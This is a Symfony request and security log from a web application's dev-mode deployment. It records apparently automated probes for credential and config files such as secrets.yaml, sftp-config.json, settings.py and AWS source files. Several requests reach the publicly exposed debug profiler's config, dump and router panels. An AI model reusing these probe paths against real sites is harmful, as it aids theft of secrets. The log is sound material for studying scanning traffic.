[2025-12-20 20:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo.php3"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo.php3\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:32:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo.php4"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo.php4\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:32:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo.php5"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo.php5\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:32:29] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 20:32:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /prevlaravel/sftp-config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /prevlaravel/sftp-config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:32:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /private/config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /private/config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:32:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /providers/aws.service.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /providers/aws.service.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:32:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"060c3c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/060c3c","method":"GET"} []
[2025-12-20 20:32:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 20:33:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/client/planinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/client/planinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:33:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /readme.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /readme.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:33:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /recipes/elb.rb."" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /recipes/elb.rb.\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:33:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /secrets.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /secrets.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /secrets.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /secrets.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:33:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6eb557","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/6eb557?panel=dump","method":"GET"} []
[2025-12-20 20:33:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-20 20:34:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"417fde","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/417fde?panel=router","method":"GET"} []
[2025-12-20 20:34:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-20 20:35:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server/main.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server/main.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:35:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server/src/util/s3_operation.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server/src/util/s3_operation.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:35:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /settings.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /settings.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:35:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /settings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /settings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:36:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /settings.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /settings.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:36:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sftp-config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sftp-config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:36:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:36:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /shared/backend/aws/identity.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /shared/backend/aws/identity.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:36:44] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 20:36:49] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 20:36:49] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 20:36:49] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 20:36:49] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 20:36:49] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 20:36:49] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 20:36:49] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 20:36:49] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 20:36:49] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 20:36:49] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 20:36:49] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 20:36:49] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 20:36:49] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 20:36:49] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 20:36:49] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 20:36:49] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 20:36:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/app/services/aws.service.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/app/services/aws.service.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:36:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/aws.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/aws.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:37:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/config.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/config.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:37:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/config/aws.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/config/aws.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:37:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/config/config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/config/config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:37:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40ca6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f40ca6?panel=exception","method":"GET"} []
[2025-12-20 20:37:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-20 20:37:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/constants.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/constants.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:38:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/libs/aws-notifications.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/libs/aws-notifications.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:38:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/main.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/main.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:38:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/main.rb"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/main.rb\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:38:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/s3.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/s3.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:39:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/settings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/settings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:39:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=config","method":"GET"} []
[2025-12-20 20:39:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 20:39:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a26a5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a26a5e?panel=cache","method":"GET"} []
[2025-12-20 20:39:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 20:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:39:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:40:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /tsconfig.app.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /tsconfig.app.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:40:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /tsconfig.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /tsconfig.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
